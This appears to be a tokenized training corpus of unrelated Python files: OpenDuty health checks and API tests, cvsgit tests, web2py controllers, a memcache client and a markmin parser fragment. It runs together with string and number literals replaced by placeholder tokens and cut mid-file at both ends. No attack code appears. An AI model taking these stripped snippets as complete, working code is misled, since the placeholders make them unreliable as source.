"<STR_LIT>" + str ( cmd . type ) ) <EOL> self . set_depend ( cmd ) <EOL> self . clear_depend ( cmd ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from time import sleep , time <EOL> import datetime <EOL> from openduty . serializers import NoneSerializer <EOL> from openduty . models import Incident <EOL> from rest_framework . response import Response <EOL> from rest_framework import status <EOL> from rest_framework import viewsets <EOL> from . celery import add <EOL> from random import randint <EOL> class HealthCheckViewSet ( viewsets . ModelViewSet ) : <EOL> queryset = Incident . objects . all ( ) <EOL> serializer_class = NoneSerializer <EOL> def list ( self , request ) : <EOL> try : <EOL> firstincident = Incident . objects . first ( ) <EOL> except Exception : <EOL> return Response ( "<STR_LIT>" , status = status . HTTP_500_INTERNAL_SERVER_ERROR ) <EOL> return Response ( "<STR_LIT:OK>" , status = status . HTTP_200_OK ) <EOL> class CeleryHealthCheckViewSet ( viewsets . ModelViewSet ) : <EOL> queryset = Incident . objects . all ( ) <EOL> serializer_class = NoneSerializer <EOL> def list ( self , request ) : <EOL> try : <EOL> timestamp = int ( time ( ) ) <EOL> random = randint ( <NUM_LIT:0> , <NUM_LIT> ) <EOL> result = add . apply_async ( args = [ timestamp , random ] ) <EOL> now = datetime . datetime . now ( ) <EOL> while ( now + datetime . timedelta ( seconds = <NUM_LIT:10> ) ) > datetime . datetime . now ( ) : <EOL> if result . result == timestamp + random : <EOL> return Response ( "<STR_LIT:OK>" , status = status . HTTP_200_OK ) <EOL> sleep ( <NUM_LIT:0.5> ) <EOL> except IOError : <EOL> pass <EOL> return Response ( "<STR_LIT>" , status = status . HTTP_500_INTERNAL_SERVER_ERROR ) </s>
<s> from django . utils import timezone <EOL> from openduty . models import Service , ServiceTokens , Token , SchedulePolicy , Incident <EOL> from rest_framework . reverse import reverse <EOL> from rest_framework . test import APIRequestFactory , APIClient <EOL> from . shared import BaseTestCase , random_string <EOL> class TestAPI ( BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestAPI , self ) . setUp ( ) <EOL> self . sp = SchedulePolicy ( name = random_string ( ) , repeat_times = <NUM_LIT:1> ) <EOL> self . sp . save ( ) <EOL> self . service = Service ( name = random_string ( ) , policy = self . sp ) <EOL> self . service . save ( ) <EOL> self . token = Token ( key = "<STR_LIT>" ) <EOL> self . token . save ( ) <EOL> self . servicetoken = ServiceTokens ( name = "<STR_LIT>" , service_id = self . service , token_id = self . token ) <EOL> self . servicetoken . save ( ) <EOL> self . service2 = Service ( name = random_string ( ) , policy = self . sp ) <EOL> self . service2 . save ( ) <EOL> self . token2 = Token ( key = "<STR_LIT>" ) <EOL> self . token2 . save ( ) <EOL> self . servicetoken2 = ServiceTokens ( name = "<STR_LIT>" , service_id = self . service2 , token_id = self . token2 ) <EOL> self . servicetoken2 . save ( ) <EOL> def tearDown ( self ) : <EOL> super ( TestAPI , self ) . tearDown ( ) <EOL> try : <EOL> self . servicetoken . delete ( ) <EOL> self . servicetoken2 . delete ( ) <EOL> self . token2 . delete ( ) <EOL> self . token . delete ( ) <EOL> self . service2 . delete ( ) <EOL> self . service . delete ( ) <EOL> self . sp . delete ( ) <EOL> except : <EOL> pass <EOL> def test_create_event ( self ) : <EOL> try : <EOL> client = APIClient ( ) <EOL> response = client . post ( <EOL> '<STR_LIT>' , <EOL> data = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . token . key , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : "<STR_LIT:test>" <EOL> } , <EOL> ) <EOL> self . 
assertEqual ( <NUM_LIT> , response . status_code ) <EOL> new_instance = Incident . objects . get ( incident_key = '<STR_LIT>' ) <EOL> self . assertEqual ( "<STR_LIT>" , new_instance . incident_key ) <EOL> self . assertEqual ( Incident . TRIGGER , new_instance . event_type ) <EOL> self . assertEqual ( self . service , new_instance . service_key ) <EOL> finally : <EOL> pass <EOL> def test_create_event_fails_with_invalid_key ( self ) : <EOL> try : <EOL> client = APIClient ( ) <EOL> response = client . post ( <EOL> '<STR_LIT>' , <EOL> data = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : "<STR_LIT:test>" <EOL> } , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , response . status_code ) <EOL> finally : <EOL> pass <EOL> def inject_incident ( self ) : <EOL> incident = Incident ( ) <EOL> incident . service_key = self . service <EOL> incident . event_type = Incident . TRIGGER <EOL> incident . incident_key = "<STR_LIT>" <EOL> incident . description = "<STR_LIT:test>" <EOL> incident . details = "<STR_LIT:test>" <EOL> incident . occurred_at = timezone . now ( ) <EOL> incident . save ( ) <EOL> def test_create_event_different_service ( self ) : <EOL> self . inject_incident ( ) <EOL> try : <EOL> client = APIClient ( ) <EOL> response = client . post ( <EOL> '<STR_LIT>' , <EOL> data = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . token2 . key , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : "<STR_LIT:test>" <EOL> } , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , response . status_code ) <EOL> incidents = Incident . objects . all ( ) <EOL> self . assertEqual ( <NUM_LIT:2> , incidents . count ( ) ) <EOL> finally : <EOL> pass <EOL> def test_incident_recovery ( self ) : <EOL> self . inject_incident ( ) <EOL> try : <EOL> client = APIClient ( ) <EOL> response = client . 
post ( <EOL> '<STR_LIT>' , <EOL> data = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . token . key , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : "<STR_LIT:test>" <EOL> } , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , response . status_code ) <EOL> updated = Incident . objects . get ( incident_key = '<STR_LIT>' ) <EOL> self . assertEqual ( Incident . RESOLVE , updated . event_type ) <EOL> finally : <EOL> updated . delete ( ) <EOL> def test_incident_acknowledge ( self ) : <EOL> self . inject_incident ( ) <EOL> try : <EOL> client = APIClient ( ) <EOL> response = client . post ( <EOL> '<STR_LIT>' , <EOL> data = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . token . key , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : "<STR_LIT:test>" <EOL> } , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , response . status_code ) <EOL> updated = Incident . objects . get ( incident_key = '<STR_LIT>' ) <EOL> self . assertEqual ( Incident . ACKNOWLEDGE , updated . event_type ) <EOL> finally : <EOL> updated . delete ( ) </s>
<s> import os <EOL> from os . path import dirname , join , isfile <EOL> from shutil import rmtree <EOL> import unittest <EOL> from cvsgit . command . init import init <EOL> from cvsgit . command . clone import Clone <EOL> from cvsgit . command . pull import pull <EOL> from cvsgit . command . verify import Verify <EOL> from cvsgit . git import Git <EOL> from cvsgit . utils import Tempdir <EOL> class Test ( unittest . TestCase ) : <EOL> def test_clone ( self ) : <EOL> """<STR_LIT>""" <EOL> with Tempdir ( cwd = True ) as tempdir : <EOL> source = join ( dirname ( __file__ ) , '<STR_LIT:data>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( Clone ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , source ) , <NUM_LIT:0> ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:0> , Verify ( ) . eval ( ) ) <EOL> rcs_mode = os . stat ( join ( source , '<STR_LIT>' ) ) . st_mode <EOL> wc_mode = os . stat ( '<STR_LIT>' ) . st_mode <EOL> self . assertTrue ( ( rcs_mode & <NUM_LIT:0> <NUM_LIT> ) != <NUM_LIT:0> ) <EOL> self . assertEquals ( rcs_mode , wc_mode ) <EOL> def test_clone_bare ( self ) : <EOL> """<STR_LIT>""" <EOL> with Tempdir ( cwd = True ) as tempdir : <EOL> source = join ( dirname ( __file__ ) , '<STR_LIT:data>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( Clone ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , source ) , <NUM_LIT:0> ) <EOL> self . assertTrue ( isfile ( join ( tempdir , '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> def test_clone_with_zombie_rcs_file ( self ) : <EOL> """<STR_LIT>""" <EOL> with Tempdir ( cwd = True ) : <EOL> source = join ( dirname ( __file__ ) , '<STR_LIT:data>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:0> , Clone ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , source ) ) <EOL> os . 
chdir ( '<STR_LIT>' ) <EOL> def test_clone_partial_alternative ( self ) : <EOL> """<STR_LIT>""" <EOL> head1 = None <EOL> with Tempdir ( cwd = True ) as tempdir : <EOL> source = join ( dirname ( __file__ ) , '<STR_LIT:data>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:0> , Clone ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , source ) ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> head1 = Git ( ) . rev_parse ( '<STR_LIT>' ) <EOL> head2 = None <EOL> with Tempdir ( cwd = True ) as tempdir : <EOL> source = join ( dirname ( __file__ ) , '<STR_LIT:data>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:0> , init ( ) . eval ( '<STR_LIT>' , source ) ) <EOL> self . assertEquals ( <NUM_LIT:0> , pull ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( head1 , Git ( ) . rev_parse ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:0> , pull ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( head1 , Git ( ) . rev_parse ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:0> , pull ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertEqual ( head1 , Git ( ) . rev_parse ( '<STR_LIT>' ) ) <EOL> def test_git_clone_from_cvs_clone ( self ) : <EOL> """<STR_LIT>""" <EOL> head1 = None <EOL> with Tempdir ( cwd = True ) as tempdir : <EOL> source = join ( dirname ( __file__ ) , '<STR_LIT:data>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:0> , Clone ( ) . eval ( '<STR_LIT>' , source , '<STR_LIT>' ) ) <EOL> Git ( ) . check_command ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( Git ( '<STR_LIT>' ) . rev_parse ( '<STR_LIT>' ) , <EOL> Git ( '<STR_LIT:test>' ) . rev_parse ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( '<STR_LIT>' , <EOL> Git ( '<STR_LIT:test>' ) . symbolic_ref ( '<STR_LIT>' ) ) </s>
<s> import csv <EOL> import os <EOL> from db . Corpus_DB import Corpus_DB <EOL> import utils . uploads as uploads <EOL> def index ( ) : <EOL> return { } <EOL> def generic_input ( request , form , process_upload ) : <EOL> flash = "<STR_LIT>" <EOL> if form . accepts ( request , session ) : <EOL> ss_fname = form . vars . name + '<STR_LIT>' <EOL> ss_fpath = os . path . join ( uploads . spreadsheet_dir ( request ) , ss_fname ) <EOL> pt_fname = form . vars . name + '<STR_LIT>' <EOL> pt_fpath = os . path . join ( uploads . plaintext_dir ( request ) , pt_fname ) <EOL> if not os . path . isfile ( ss_fpath ) and not os . path . isfile ( pt_fpath ) : <EOL> ssheet , ptext = process_upload ( form ) <EOL> uploads . save_spreadsheet ( request , form . vars . name , ssheet ) <EOL> uploads . save_plaintext ( request , form . vars . name , ptext ) <EOL> flash = "<STR_LIT>" <EOL> else : <EOL> flash = "<STR_LIT>" <EOL> elif form . errors : <EOL> flash = "<STR_LIT>" <EOL> else : <EOL> flash = "<STR_LIT>" <EOL> return { "<STR_LIT>" : form , "<STR_LIT>" : flash } <EOL> def spreadsheet ( ) : <EOL> def ImportSpreadsheet ( dataset_id , spreadsheet_filename , is_csv = False , id_column = '<STR_LIT>' , content_column = '<STR_LIT>' ) : <EOL> dataset_path = '<STR_LIT>' . format ( request . folder , dataset_id ) <EOL> if not os . path . exists ( dataset_path ) : <EOL> os . makedirs ( dataset_path ) <EOL> with Corpus_DB ( path = dataset_path , isImport = True ) as corpus_db : <EOL> corpus_db . 
ImportFromSpreadsheet ( spreadsheet_filename , is_csv = is_csv , id_key = id_column , content_key = content_column ) <EOL> DOC_ID_FIELD = "<STR_LIT>" <EOL> DOC_CONTENT_FIELD = "<STR_LIT>" <EOL> form = FORM ( <EOL> "<STR_LIT>" , <EOL> INPUT ( _name = "<STR_LIT:name>" , _type = "<STR_LIT>" , requires = IS_NOT_EMPTY ( ) ) , <EOL> "<STR_LIT>" , <EOL> INPUT ( _name = DOC_ID_FIELD , value = DOC_ID_FIELD , _type = "<STR_LIT>" , requires = IS_NOT_EMPTY ( ) ) , <EOL> "<STR_LIT>" , <EOL> INPUT ( _name = DOC_CONTENT_FIELD , value = DOC_CONTENT_FIELD , _type = "<STR_LIT>" , requires = IS_NOT_EMPTY ( ) ) , <EOL> "<STR_LIT>" , <EOL> INPUT ( _name = "<STR_LIT>" , _type = "<STR_LIT:file>" , requires = IS_NOT_EMPTY ( ) ) , <EOL> INPUT ( _type = "<STR_LIT>" ) <EOL> ) <EOL> def process_upload ( form ) : <EOL> upload = form . vars . corpus . file <EOL> ptext = [ ] <EOL> reader = csv . DictReader ( upload , delimiter = "<STR_LIT:U+002C>" ) <EOL> field_map = { form . vars . doc_id : DOC_ID_FIELD , form . vars . doc_content : DOC_CONTENT_FIELD } <EOL> ssheet = [ [ field_map [ field ] if field in field_map else field <EOL> for field in reader . fieldnames ] ] <EOL> for row in reader : <EOL> ssheet . append ( row ) <EOL> ptext . append ( "<STR_LIT>" . format ( row [ DOC_ID_FIELD ] , row [ DOC_CONTENT_FIELD ] ) ) <EOL> return ( ssheet , "<STR_LIT>" . join ( ptext ) ) <EOL> return generic_input ( request , form , process_upload ) <EOL> def plaintext ( ) : <EOL> def ImportPlaintext ( dataset_id , plaintext_filename ) : <EOL> dataset_path = '<STR_LIT>' . format ( request . folder , dataset_id ) <EOL> if not os . path . exists ( dataset_path ) : <EOL> os . makedirs ( dataset_path ) <EOL> with Corpus_DB ( path = dataset_path , isImport = True ) as corpus_db : <EOL> corpus_db . 
ImportFromFile ( plaintext_filename ) <EOL> form = FORM ( <EOL> "<STR_LIT>" , <EOL> INPUT ( _name = "<STR_LIT:name>" , _type = "<STR_LIT>" , requires = IS_NOT_EMPTY ( ) ) , <EOL> "<STR_LIT>" , <EOL> BR ( ) , <EOL> TEXTAREA ( _name = '<STR_LIT>' , value = '<STR_LIT>' , requires = IS_NOT_EMPTY ( ) ) , <EOL> INPUT ( _type = "<STR_LIT>" ) <EOL> ) <EOL> def process_upload ( form ) : <EOL> upload = form . vars . corpus <EOL> ptext = [ ] <EOL> ssheet = [ [ "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> for n , line in enumerate ( upload . split ( "<STR_LIT:\n>" ) ) : <EOL> ptext . append ( str ( n ) + "<STR_LIT:U+0020>" + line . strip ( ) ) <EOL> ssheet . append ( { "<STR_LIT>" : str ( n ) , <EOL> "<STR_LIT>" : line . strip ( ) } ) <EOL> return ( ssheet , "<STR_LIT:\n>" . join ( ptext ) ) <EOL> return generic_input ( request , form , process_upload ) </s>
<s> from handlers . Home_Core import Home_Core <EOL> class BOW_Core ( Home_Core ) : <EOL> def __init__ ( self , request , response , bow_db ) : <EOL> super ( BOW_Core , self ) . __init__ ( request , response ) <EOL> self . bowDB = bow_db <EOL> self . db = bow_db . db <EOL> def GetDocLimits ( self ) : <EOL> docOffset = self . GetNonNegativeIntegerParam ( '<STR_LIT>' ) <EOL> docLimit = self . GetNonNegativeIntegerParam ( '<STR_LIT>' ) <EOL> self . params . update ( { <EOL> '<STR_LIT>' : docOffset , <EOL> '<STR_LIT>' : docLimit <EOL> } ) <EOL> if docOffset is None : <EOL> docOffset = <NUM_LIT:0> <EOL> if docLimit is None : <EOL> docLimit = <NUM_LIT:5> <EOL> return docOffset , docLimit <EOL> def GetTermLimits ( self ) : <EOL> termOffset = self . GetNonNegativeIntegerParam ( '<STR_LIT>' ) <EOL> termLimit = self . GetNonNegativeIntegerParam ( '<STR_LIT>' ) <EOL> self . params . update ( { <EOL> '<STR_LIT>' : termOffset , <EOL> '<STR_LIT>' : termLimit <EOL> } ) <EOL> if termOffset is None : <EOL> termOffset = <NUM_LIT:0> <EOL> if termLimit is None : <EOL> termLimit = <NUM_LIT:5> <EOL> return termOffset , termLimit <EOL> def GetCellLimits ( self ) : <EOL> cellLimit = self . GetNonNegativeIntegerParam ( '<STR_LIT>' ) <EOL> self . params . update ( { <EOL> '<STR_LIT>' : cellLimit <EOL> } ) <EOL> if cellLimit is None : <EOL> cellLimit = <NUM_LIT:100> <EOL> return cellLimit <EOL> def LoadTermStats ( self , table_name , var_name , field_name ) : <EOL> termOffset , termLimit = self . GetTermLimits ( ) <EOL> query = """<STR_LIT>""" . format ( <EOL> FIELD = field_name , TABLE = table_name , LIMIT = termLimit , OFFSET = termOffset ) <EOL> rows = self . db . executesql ( query , as_dict = True ) <EOL> header = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : self . db . term_texts . term_text . type } , <EOL> { '<STR_LIT:name>' : field_name , '<STR_LIT:type>' : self . db [ table_name ] . value . type } <EOL> ] <EOL> self . content . 
update ( { <EOL> var_name : rows , <EOL> '<STR_LIT>' : termLimit , <EOL> '<STR_LIT>' : termOffset , <EOL> '<STR_LIT>' : self . db ( self . db . term_texts ) . count ( ) <EOL> } ) <EOL> self . table = rows <EOL> self . header = header <EOL> def LoadCoTermStats ( self , table_name , var_name ) : <EOL> termOffset , termLimit = self . GetTermLimits ( ) <EOL> query = """<STR_LIT>""" . format ( <EOL> TABLE = table_name , LIMIT = termLimit , OFFSET = termOffset ) <EOL> rows = self . db . executesql ( query , as_dict = True ) <EOL> header = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : self . db . term_texts . term_text . type } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : self . db . term_texts . term_text . type } , <EOL> { '<STR_LIT:name>' : '<STR_LIT:value>' , '<STR_LIT:type>' : self . db [ table_name ] . value . type } <EOL> ] <EOL> self . content . update ( { <EOL> var_name : rows , <EOL> '<STR_LIT>' : termLimit , <EOL> '<STR_LIT>' : termOffset , <EOL> '<STR_LIT>' : self . db ( self . db [ table_name ] ) . count ( ) , <EOL> '<STR_LIT>' : self . db ( self . db . term_texts ) . count ( ) <EOL> } ) <EOL> self . table = rows <EOL> self . header = header <EOL> def LoadTermFreqs ( self ) : <EOL> self . LoadTermStats ( self . db . term_freqs , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def LoadTermProbs ( self ) : <EOL> self . LoadTermStats ( self . db . term_probs , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def LoadTermCoFreqs ( self ) : <EOL> self . LoadCoTermStats ( self . db . term_co_freqs , '<STR_LIT>' ) <EOL> def LoadTermCoProbs ( self ) : <EOL> self . LoadCoTermStats ( self . db . term_co_probs , '<STR_LIT>' ) <EOL> def LoadTermG2 ( self ) : <EOL> self . LoadCoTermStats ( self . db . term_g2 , '<STR_LIT>' ) <EOL> def LoadSentenceCoFreqs ( self ) : <EOL> self . LoadCoTermStats ( self . db . sentences_co_freqs , '<STR_LIT>' ) <EOL> def LoadSentenceCoProbs ( self ) : <EOL> self . LoadCoTermStats ( self . db . 
sentences_co_probs , '<STR_LIT>' ) <EOL> def LoadSentenceG2 ( self ) : <EOL> self . LoadCoTermStats ( self . db . sentences_g2 , '<STR_LIT>' ) </s>
<s> import os <EOL> from gluon . settings import global_settings , read_file <EOL> def index ( ) : <EOL> app = request . args ( <NUM_LIT:0> ) <EOL> return dict ( app = app ) <EOL> def profiler ( ) : <EOL> """<STR_LIT>""" <EOL> KEY = '<STR_LIT>' <EOL> filename = global_settings . cmd_options . profiler_filename <EOL> data = '<STR_LIT>' <EOL> if filename : <EOL> if KEY in request . cookies : <EOL> size = int ( request . cookies [ KEY ] . value ) <EOL> else : <EOL> size = <NUM_LIT:0> <EOL> if os . path . exists ( filename ) : <EOL> data = read_file ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> if size < len ( data ) : <EOL> data = data [ size : ] <EOL> else : <EOL> size = <NUM_LIT:0> <EOL> size += len ( data ) <EOL> response . cookies [ KEY ] = size <EOL> return data </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> from google . appengine . api . memcache import Client <EOL> class MemcacheClient ( object ) : <EOL> client = Client ( ) <EOL> def __init__ ( self , request , default_time_expire = <NUM_LIT> ) : <EOL> self . request = request <EOL> self . default_time_expire = default_time_expire <EOL> def __call__ ( <EOL> self , <EOL> key , <EOL> f , <EOL> time_expire = None , <EOL> ) : <EOL> if time_expire is None : <EOL> time_expire = self . default_time_expire <EOL> key = '<STR_LIT>' % ( self . request . application , key ) <EOL> value = None <EOL> obj = self . client . get ( key ) <EOL> if obj : <EOL> value = obj [ <NUM_LIT:1> ] <EOL> elif f is not None : <EOL> value = f ( ) <EOL> self . client . set ( key , ( time . time ( ) , value ) , time = time_expire ) <EOL> return value <EOL> def increment ( self , key , value = <NUM_LIT:1> ) : <EOL> key = '<STR_LIT>' % ( self . request . application , key ) <EOL> obj = self . client . get ( key ) <EOL> if obj : <EOL> value = obj [ <NUM_LIT:1> ] + value <EOL> self . client . set ( key , ( time . time ( ) , value ) ) <EOL> return value <EOL> def incr ( self , key , value = <NUM_LIT:1> ) : <EOL> return self . increment ( key , value ) <EOL> def clear ( self , key = None ) : <EOL> if key : <EOL> key = '<STR_LIT>' % ( self . request . application , key ) <EOL> self . client . delete ( key ) <EOL> else : <EOL> self . client . flush_all ( ) <EOL> def delete ( self , * a , ** b ) : <EOL> return self . client . delete ( * a , ** b ) <EOL> def get ( self , * a , ** b ) : <EOL> return self . client . get ( * a , ** b ) <EOL> def set ( self , * a , ** b ) : <EOL> return self . client . set ( * a , ** b ) <EOL> def flush_all ( self , * a , ** b ) : <EOL> return self . client . delete ( * a , ** b ) </s>
<s> import re <EOL> import urllib <EOL> from cgi import escape <EOL> from string import maketrans <EOL> try : <EOL> from ast import parse as ast_parse <EOL> import ast <EOL> except ImportError : <EOL> from compiler import parse <EOL> import compiler . ast as ast <EOL> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> __doc__ = """<STR_LIT>""" <EOL> html_colors = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> META = '<STR_LIT>' <EOL> LINK = '<STR_LIT>' <EOL> DISABLED_META = '<STR_LIT>' <EOL> LATEX = '<STR_LIT>' <EOL> regex_URL = re . compile ( r'<STR_LIT>' ) <EOL> regex_env2 = re . compile ( r'<STR_LIT>' ) <EOL> regex_expand_meta = re . compile ( '<STR_LIT:(>' + META + '<STR_LIT:|>' + DISABLED_META + '<STR_LIT>' ) <EOL> regex_dd = re . compile ( r'<STR_LIT>' ) <EOL> regex_code = re . compile ( '<STR_LIT:(>' + META + '<STR_LIT:|>' + DISABLED_META + r'<STR_LIT>' , re . S ) <EOL> regex_strong = re . compile ( r'<STR_LIT>' ) <EOL> regex_del = re . compile ( r'<STR_LIT>' ) <EOL> regex_em = re . compile ( r"<STR_LIT>" ) <EOL> regex_num = re . compile ( r"<STR_LIT>" ) <EOL> regex_list = re . compile ( '<STR_LIT>' ) <EOL> regex_bq_headline = re . compile ( '<STR_LIT>' ) <EOL> regex_tq = re . compile ( '<STR_LIT>' ) <EOL> regex_proto = re . compile ( r'<STR_LIT>' , re . M ) <EOL> regex_auto = re . compile ( r'<STR_LIT>' , re . M ) <EOL> regex_link = re . compile ( r'<STR_LIT:(>' + LINK + r'<STR_LIT>' , re . S ) <EOL> regex_link_level2 = re . compile ( r'<STR_LIT>' , re . S ) <EOL> regex_media_level2 = re . compile ( r'<STR_LIT>' , re . S ) <EOL> regex_markmin_escape = re . compile ( r"<STR_LIT>" ) <EOL> regex_backslash = re . 
compile ( r"<STR_LIT>" ) <EOL> ttab_in = maketrans ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> ttab_out = maketrans ( '<STR_LIT>' , "<STR_LIT>" ) <EOL> regex_quote = re . compile ( '<STR_LIT>' ) <EOL> def make_dict ( b ) : <EOL> return '<STR_LIT>' % regex_quote . sub ( "<STR_LIT>" , b ) <EOL> def safe_eval ( node_or_string , env ) : <EOL> """<STR_LIT>""" <EOL> _safe_names = { '<STR_LIT:None>' : None , '<STR_LIT:True>' : True , '<STR_LIT:False>' : False } <EOL> _safe_names . update ( env ) <EOL> if isinstance ( node_or_string , basestring ) : <EOL> node_or_string = ast_parse ( node_or_string , mode = '<STR_LIT>' ) <EOL> if isinstance ( node_or_string , ast . Expression ) : <EOL> node_or_string = node_or_string . body <EOL> def _convert ( node ) : <EOL> if isinstance ( node , ast . Str ) : <EOL> return node . s <EOL> elif isinstance ( node , ast . Num ) : <EOL> return node . n <EOL> elif isinstance ( node , ast . Tuple ) : <EOL> return tuple ( map ( _convert , node . elts ) ) <EOL> elif isinstance ( node , ast . List ) : <EOL> return list ( map ( _convert , node . elts ) ) <EOL> elif isinstance ( node , ast . Dict ) : <EOL> return dict ( ( _convert ( k ) , _convert ( v ) ) for k , v <EOL> in zip ( node . keys , node . values ) ) <EOL> elif isinstance ( node , ast . Name ) : <EOL> if node . id in _safe_names : <EOL> return _safe_names [ node . id ] <EOL> elif isinstance ( node , ast . BinOp ) and isinstance ( node . op , ( Add , Sub ) ) and isinstance ( node . right , Num ) and isinstance ( node . right . n , complex ) and isinstance ( node . left , Num ) and isinstance ( node . left . n , ( int , long , float ) ) : <EOL> left = node . left . n <EOL> right = node . right . n <EOL> if isinstance ( node . op , Add ) : <EOL> return left + right <EOL> else : <EOL> return left - right <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return _convert ( node_or_string ) <EOL> def markmin_escape ( text ) : <EOL> """<STR_LIT>""" <EOL> return regex_markmin_escape . 
sub ( <EOL> lambda m : '<STR_LIT:\\>' + m . group ( <NUM_LIT:0> ) . replace ( '<STR_LIT:\\>' , '<STR_LIT>' ) , text ) <EOL> def replace_autolinks ( text , autolinks ) : <EOL> return regex_auto . sub ( lambda m : autolinks ( m . group ( '<STR_LIT:k>' ) ) , text ) <EOL> def replace_at_urls ( text , url ) : <EOL> def u1 ( match , url = url ) : <EOL> a , c , f , args = match . group ( '<STR_LIT:a>' , '<STR_LIT:c>' , '<STR_LIT:f>' , '<STR_LIT:args>' ) <EOL> return url ( a = a or None , c = c or None , f = f or None , <EOL> args = ( args or '<STR_LIT>' ) . split ( '<STR_LIT:/>' ) , scheme = True , host = True ) <EOL> return regex_URL . sub ( u1 , text ) <EOL> def replace_components ( text , env ) : <EOL> def u2 ( match , env = env ) : <EOL> f = env . get ( match . group ( '<STR_LIT:a>' ) , match . group ( <NUM_LIT:0> ) ) <EOL> if callable ( f ) : <EOL> b = match . group ( '<STR_LIT:b>' ) <EOL> try : <EOL> b = safe_eval ( make_dict ( b ) , env ) <EOL> except : <EOL> pass <EOL> try : <EOL> f = f ( ** b ) if isinstance ( b , dict ) else f ( b ) <EOL> except Exception , e : <EOL> f = '<STR_LIT>' % e <EOL> return str ( f ) <EOL> text = regex_env2 . sub ( u2 , text ) <EOL> return text <EOL> def autolinks_simple ( url ) : <EOL> """<STR_LIT>""" <EOL> u_url = url . lower ( ) <EOL> if '<STR_LIT:@>' in url and not '<STR_LIT>' in url : <EOL> return '<STR_LIT>' % ( url , url ) <EOL> elif u_url . endswith ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> return '<STR_LIT>' % url <EOL> elif u_url . endswith ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> return '<STR_LIT>' % url <EOL> elif u_url . 
